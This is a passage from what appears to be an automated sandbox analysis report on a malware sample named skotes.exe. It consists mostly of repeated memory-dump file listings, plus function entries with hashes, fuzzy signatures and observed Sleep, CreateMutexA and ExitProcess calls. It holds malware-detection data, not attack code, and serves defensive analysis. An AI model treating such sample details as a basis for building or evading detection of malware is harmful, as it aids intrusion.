Associated: 00000002.00000002.268896872404.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896959187.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896996938.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897038037.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897083058.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897122627.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897162195.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897203295.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897253695.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897310854.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897361850.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897418808.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897471791.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897530977.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897600288.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897654234.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897715066.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897770094.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897832360.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897884909.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897936449.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897999755.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898060398.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898109275.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898159282.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898213725.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898265592.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898312614.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898353432.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898415769.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898461725.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898508422.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898553832.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898593564.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898634192.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898634192.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898761257.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898803637.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898841581.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898878584.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898920908.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898961666.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899007062.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899051195.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899094290.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9c0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 749869be069792a4baad3fd24178dd0bf98a5fa2d5b61fa2f702347d58f54816
Instruction ID: d559eb3bd63ed41f8d6c2b150f93342099d0ae32fcea52c7fadeae5032475277
Opcode Fuzzy Hash: 749869be069792a4baad3fd24178dd0bf98a5fa2d5b61fa2f702347d58f54816
Instruction Fuzzy Hash: DA213732B042059BEF1C9B6CECCDB6DB765EBD1314F20461DE418972E5C77999818B12

Function 009CA856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009CA963
CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981

Memory Dump Source

Source File: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000002.00000002.268896134967.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896179082.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896320819.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896357790.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896399330.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896696835.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896733177.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896793248.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896834758.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896872404.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896872404.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896959187.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896996938.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897038037.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897083058.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897122627.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897162195.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897203295.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897253695.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897310854.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897361850.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897418808.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897471791.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897530977.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897600288.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897654234.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897715066.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897770094.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897832360.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897884909.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897936449.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897999755.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898060398.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898109275.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898159282.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898213725.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898265592.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898312614.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898353432.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898415769.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898461725.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898508422.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898553832.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898593564.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898634192.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898634192.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898761257.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898803637.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898841581.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898878584.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898920908.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898961666.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899007062.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899051195.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899094290.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9c0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 3232f8774de9309b8e0b8da19ff940794494c55eb20b10bc20aa066515a2be8a
Instruction ID: 97b5233d459dc90f145e125dd83a1f1eb6262446a86fd6b6b19f45fa35b562f3
Opcode Fuzzy Hash: 3232f8774de9309b8e0b8da19ff940794494c55eb20b10bc20aa066515a2be8a
Instruction Fuzzy Hash: 6B213031B452099BEB2857A8988AF7EB2659FC1704F244C1EE148D72D1CB7D49818663

Function 009CA34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009CA963
CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981

Memory Dump Source

Source File: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000002.00000002.268896134967.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896179082.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896320819.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896357790.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896399330.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896696835.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896733177.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896793248.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896834758.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896872404.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896872404.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896959187.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896996938.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897038037.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897083058.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897122627.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897162195.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897203295.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897253695.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897310854.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897361850.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897418808.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897471791.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897530977.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897600288.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897654234.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897715066.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897770094.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897832360.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897884909.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897936449.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897999755.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898060398.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898109275.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898159282.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898213725.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898265592.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898312614.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898353432.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898415769.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898461725.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898508422.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898553832.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898593564.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898634192.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898634192.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898761257.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898803637.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898841581.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898878584.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898920908.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898961666.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899007062.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899051195.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899094290.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9c0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: ae0c57848b44451fc6c1ba72eebe80ed49e04c745d8af54e07d0b2eeaf605fa4
Instruction ID: 05294e9e3dd99a89ae56f1073232214d9e6ff466a94d9e4b4350517c85ff6070
Opcode Fuzzy Hash: ae0c57848b44451fc6c1ba72eebe80ed49e04c745d8af54e07d0b2eeaf605fa4
Instruction Fuzzy Hash: 13216732B412099BEB189B68EC8AB6DB766EBD1314F20461DE408973D0C77A9A808753

Analysis Process: skotes.exePID: 6140, Parent PID: 6748COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1886
Total number of Limit Nodes:	9

Executed Functions

Function 009F652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,009F652A,?,?,?,?,?,009F7661), ref: 009F6566

Memory Dump Source

Source File: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.268897231334.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897285467.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897469676.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897531196.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897605032.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897963140.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898007853.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898064981.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898115829.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898160888.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898257929.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898307061.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898351313.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898396305.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898441590.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898485575.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898530916.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898572212.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898614687.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898658203.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898713220.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898762071.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898796658.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898834319.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898872512.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898911110.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898958632.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899004161.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899049281.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899158645.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899205310.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899242154.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899281797.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899324488.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899367116.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899409985.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899456104.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899506082.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899558796.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899604806.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899647227.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899692997.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899733316.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899733316.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899873452.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899915305.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899955435.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900002889.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900050472.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900094567.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900135220.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900186248.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900228243.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9c0000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5e74003d0042d216313fa177963bfa2570589a047f46320dbd5d40fb4ea53d5f
Instruction ID: 0eb605e943988dd32d89c2370916b3faa493c6b4ec87fbf8f078bc8f7c6e1e43
Opcode Fuzzy Hash: 5e74003d0042d216313fa177963bfa2570589a047f46320dbd5d40fb4ea53d5f
Instruction Fuzzy Hash: A0E0EC7014124CAACE257B68CC19A693B6EFF91759F245814FA085A236CB25DD82CB91

Function 009C9BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009CA963
CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981

Memory Dump Source

Source File: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.268897231334.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897285467.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897469676.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897531196.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897605032.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897963140.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898007853.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898064981.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898115829.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898160888.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898257929.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898307061.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898351313.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898396305.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898441590.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898485575.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898530916.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898572212.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898614687.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898658203.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898713220.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898762071.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898796658.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898834319.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898872512.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898911110.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898958632.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899004161.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899049281.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899158645.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899205310.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899242154.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899281797.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899324488.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899367116.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
